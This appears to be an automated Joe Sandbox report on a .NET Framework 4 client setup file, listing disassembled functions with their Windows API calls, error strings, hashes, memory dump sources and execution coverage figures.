• Opcode ID: 04c00dbb0a667938901ba17c4549cafe12ecd3cc649de2d2829449b712a7e15f
• Instruction ID: 6e84cb337f3ed33f2c6bef4932b6f8e95d8fff52022facc2a71db40d10a4e8a2
• Opcode Fuzzy Hash: 04c00dbb0a667938901ba17c4549cafe12ecd3cc649de2d2829449b712a7e15f
• Instruction Fuzzy Hash: E3E08CB5E00B75AB8F1237F1BD0A8DF7A6C9F06314F004400BA20A3003EE2C9A0186E3
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00019166: LoadStringW.USER32(?,?,00000000,00000040), ref: 00019189
• MessageBoxW.USER32(00000000,?,?,00000010), ref: 00015DC5
Strings
• Failed to get error string from error: 0x%x, xrefs: 00015D48
• Failed to get error message for error: 0x%x., xrefs: 00015D91
• Failed to concatenate message with error string., xrefs: 00015D6B
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: LoadMessageString
• String ID: Failed to concatenate message with error string.$Failed to get error message for error: 0x%x.$Failed to get error string from error: 0x%x
• API String ID: 2284331267-3986587811
• Opcode ID: 70953caf9e2947ecd3f8dc5baa7d878d8885560d2b79c0ee9cc96a9cb2142f3c
• Instruction ID: 42fec8e11c9ed45256ba55cf385d402e81284aaf0807181beae6e54d4bf666d1
• Opcode Fuzzy Hash: 70953caf9e2947ecd3f8dc5baa7d878d8885560d2b79c0ee9cc96a9cb2142f3c
• Instruction Fuzzy Hash: 5A318631D40A05FADF31A794AC4AEDDB7B99B90715F208526F501BA062EB754BC0A741
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0001E3D2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,0000005F,00000000,00000010,0001E493,00000000,?,00000000,00000000), ref: 0001E43B
• __CxxThrowException@8.LIBCMT ref: 0001E460
  • Part of subcall function 0001C523: __CxxThrowException@8.LIBCMT ref: 0001C58A
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw$ByteCharH_prolog3MultiWide
                                                                                                                                                                    • String ID: _
                                                                                                                                                                    • API String ID: 3478574853-701932520
                                                                                                                                                                    • Opcode ID: 2a7aa4079981c0c29c43ddfaa896dc9a72fa5989b4bc68c6938f44d887aaeb21
                                                                                                                                                                    • Instruction ID: 993686feb2351a490f993184cbc6f77ad1f305bef3892abc5312f752c7a1e358
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a7aa4079981c0c29c43ddfaa896dc9a72fa5989b4bc68c6938f44d887aaeb21
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E211DB5900646EFDB11DF58C8819EEBBF9FF58700F50882DE5599B202C374AA85CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000040,00000000,00000000,00000000,X?f,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?), ref: 000195E8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000,?,?,00015B53), ref: 0001960D
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000008,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018813
                                                                                                                                                                      • Part of subcall function 000187EB: HeapAlloc.KERNEL32(00000000,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 0001881A
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000), ref: 00019607
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCurrentDirectoryProcess$ErrorLast
                                                                                                                                                                    • String ID: X?f
                                                                                                                                                                    • API String ID: 3246529678-1642154059
                                                                                                                                                                    • Opcode ID: cc5da3860ca997bac4aefbbc6c9b059ee70601630acc8c514f9e2fe9e6040446
                                                                                                                                                                    • Instruction ID: cda7d027fabe61256992561afed15e1655c22825a9fdc994e77c89423f768237
                                                                                                                                                                    • Opcode Fuzzy Hash: cc5da3860ca997bac4aefbbc6c9b059ee70601630acc8c514f9e2fe9e6040446
                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E573D00226EBDB2197D4CD65BEEB6A49F40764F220171EA01BB240D77A9F80DAE4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00019DA9,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A41C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00019DA9,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A43A
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A43D
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00019DA9,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A458
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A45B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$FreeProcess$CloseHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1236364404-0
                                                                                                                                                                    • Opcode ID: 6d159f748b49144208725e9247d14ff662cf35a84d4bfb3768a3d82187e38fc0
                                                                                                                                                                    • Instruction ID: 24737ed44550ca821608ba4d42c6d3dcfda6df834eb31beef19f12373ecea1b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d159f748b49144208725e9247d14ff662cf35a84d4bfb3768a3d82187e38fc0
                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF08C71701201ABEB606BB99C48FEA369C9FC6791B848112FA14D7080DAA4DC808AB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0002F6EC
                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 0002F71F
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00018D37,?,?,00000000,?,?,?,-00000001,00018D37,?), ref: 0002F750
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00018D37,00000001,?,00000000,?,?,?,-00000001,00018D37,?), ref: 0002F7BE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                    • Opcode ID: b463a2981301af2daa0ef5afc8a3a275442c09a6d7d77c6fec6fb1c211a0fd29
                                                                                                                                                                    • Instruction ID: 7f987867461d51eb2a8ab355a41a9eb66f9445049ddb495622f6665c84334de3
                                                                                                                                                                    • Opcode Fuzzy Hash: b463a2981301af2daa0ef5afc8a3a275442c09a6d7d77c6fec6fb1c211a0fd29
                                                                                                                                                                    • Instruction Fuzzy Hash: D231AC35A04266EFDB20DFA4E888DBE3BF5EF01390B1485B9E4658B1A1E730DD40DB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,0001656E,?,?,0001AFDF,00000007,?), ref: 0001671A
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,0001656E,?,?,0001AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00016721
                                                                                                                                                                      • Part of subcall function 00018E6F: GetProcessHeap.KERNEL32(00000000,?,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E79
                                                                                                                                                                      • Part of subcall function 00018E6F: HeapFree.KERNEL32(00000000,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E80
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to realloc cleanup list buffer, xrefs: 00016735
                                                                                                                                                                    • Failed to copy the file name, xrefs: 000166E0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                                                                                    • String ID: Failed to copy the file name$Failed to realloc cleanup list buffer
                                                                                                                                                                    • API String ID: 756756679-1190809427
                                                                                                                                                                    • Opcode ID: f279d3311e12a8b4ea6fcc0ac835d4496cc298a875c0fdefc78e0cb5673d3ac1
                                                                                                                                                                    • Instruction ID: b4ee893c86b0b76c390370d6a80e351742530a69acc2b4ff9657c16b9ef6420d
                                                                                                                                                                    • Opcode Fuzzy Hash: f279d3311e12a8b4ea6fcc0ac835d4496cc298a875c0fdefc78e0cb5673d3ac1
                                                                                                                                                                    • Instruction Fuzzy Hash: F51193B5904644FFEB05DFA4DD85CDEBBBDEB48314720C46AE106F7251EA369A80CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019A43: GetProcessHeap.KERNEL32(00000000,?,?,00018CCC,?,?,00000000), ref: 00019A4D
                                                                                                                                                                      • Part of subcall function 00019A43: HeapSize.KERNEL32(00000000,?,00018CCC,?,?,00000000), ref: 00019A54
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00018CE0
                                                                                                                                                                    • _vswprintf_s.LIBCMT ref: 00018D32
                                                                                                                                                                      • Part of subcall function 00018836: GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00018D82,00000000), ref: 00018852
                                                                                                                                                                      • Part of subcall function 00018836: HeapReAlloc.KERNEL32(00000000,?,00018D82,00000000), ref: 00018859
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocSize_vswprintf_slstrlen
                                                                                                                                                                    • String ID: z
                                                                                                                                                                    • API String ID: 1418926380-1657960367
                                                                                                                                                                    • Opcode ID: 2710d5c59a4bfb40ab25e691d8e7f4d7d242ac57dabcb9d457c20e18498d29f6
                                                                                                                                                                    • Instruction ID: a6eb7a121e2a41d092fc7e9ee361a2ded1bead61f1cc17b784595610b731a20c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2710d5c59a4bfb40ab25e691d8e7f4d7d242ac57dabcb9d457c20e18498d29f6
                                                                                                                                                                    • Instruction Fuzzy Hash: F131A031D00624EBCF619BA898846DDFBF4AFA5350F34C695E811EB251DA358F809B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 4104443479-2766056989
                                                                                                                                                                    • Opcode ID: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                                                                                                                                    • Instruction ID: f0f088f89f342aa9bdd6de2d057a89d36d42c10c84c836dc33b0b4b62aa4fd5a
                                                                                                                                                                    • Opcode Fuzzy Hash: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                                                                                                                                    • Instruction Fuzzy Hash: B3319EB6900219ABDB09CF64DC80AEE73ACEF49364F054629ED15ABB01D774EE50CBD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _vswprintf_s.LIBCMT ref: 00018C1D
                                                                                                                                                                      • Part of subcall function 00019A43: GetProcessHeap.KERNEL32(00000000,?,?,00018CCC,?,?,00000000), ref: 00019A4D
                                                                                                                                                                      • Part of subcall function 00019A43: HeapSize.KERNEL32(00000000,?,00018CCC,?,?,00000000), ref: 00019A54
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?), ref: 00018BCD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ProcessSize_vswprintf_slstrlen
                                                                                                                                                                    • String ID: z
                                                                                                                                                                    • API String ID: 3730482531-1657960367
                                                                                                                                                                    • Opcode ID: 7a368cfc030d05262fac549fafa5146c67729085ab532cf31e1c72b97b834039
                                                                                                                                                                    • Instruction ID: fa1eaa5d023d3723924dc5c90c4bde3d269eb5d66efbeb5d9f2d512146902f45
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a368cfc030d05262fac549fafa5146c67729085ab532cf31e1c72b97b834039
                                                                                                                                                                    • Instruction Fuzzy Hash: 1931F531A01205DBCB609BA8C8847EE77F1AF84360F30C529E011DB251DF75CF829BA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00034D38: __getptd.LIBCMT ref: 00034D3E
                                                                                                                                                                      • Part of subcall function 00034D38: __getptd.LIBCMT ref: 00034D4E
                                                                                                                                                                    • __getptd.LIBCMT ref: 000353CB
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 000353D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID: csm
                                                                                                                                                                    • API String ID: 803148776-1018135373
                                                                                                                                                                    • Opcode ID: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                                                                                                                                    • Instruction ID: 4be39662897d98e264bab707a0afec470b7aab2f11a2fa176fdf111826b96bac
                                                                                                                                                                    • Opcode Fuzzy Hash: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                                                                                                                                    • Instruction Fuzzy Hash: C1016D38801A148BCF7A9F61DC506ADB3FDAF10317FA4942DE4815A6B2CB3099E5CF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00018D82,00000000), ref: 00018852
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00018D82,00000000), ref: 00018859
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,7FFFFFFF,00000000,?,00018D82,00000000), ref: 00018863
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00018D82,00000000), ref: 0001886A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1617791916-0
                                                                                                                                                                    • Opcode ID: 653177b41e2dcd9f9bd5fe5bba0207246c9835e8f9f72aa9ea1bd67c6dc9dc09
                                                                                                                                                                    • Instruction ID: 3392ee53b61b31ef23d424177e64bfb1b01def91136fb187e218449191e9db76
                                                                                                                                                                    • Opcode Fuzzy Hash: 653177b41e2dcd9f9bd5fe5bba0207246c9835e8f9f72aa9ea1bd67c6dc9dc09
                                                                                                                                                                    • Instruction Fuzzy Hash: B5F06535100144FBD7554F659C48AE97A7AF7C5361774C624F755C6050CE38C9C19764
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018813
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 0001881A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1617791916-0
                                                                                                                                                                    • Opcode ID: 3db0484e4ef10dd6e45c3082193ac24b13f0d765e605801224ec72475cb21393
                                                                                                                                                                    • Instruction ID: 28916010ba0f9306d860695481259d15a6362dac403237120bd8ef9fdaf710c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 3db0484e4ef10dd6e45c3082193ac24b13f0d765e605801224ec72475cb21393
                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE01275600040EBD7595B64AC8CAFE75ABA7C4721774C618F362C7150DE388982C760
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:20.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:5.1%
                                                                                                                                                                    Total number of Nodes:118
                                                                                                                                                                    Total number of Limit Nodes:5
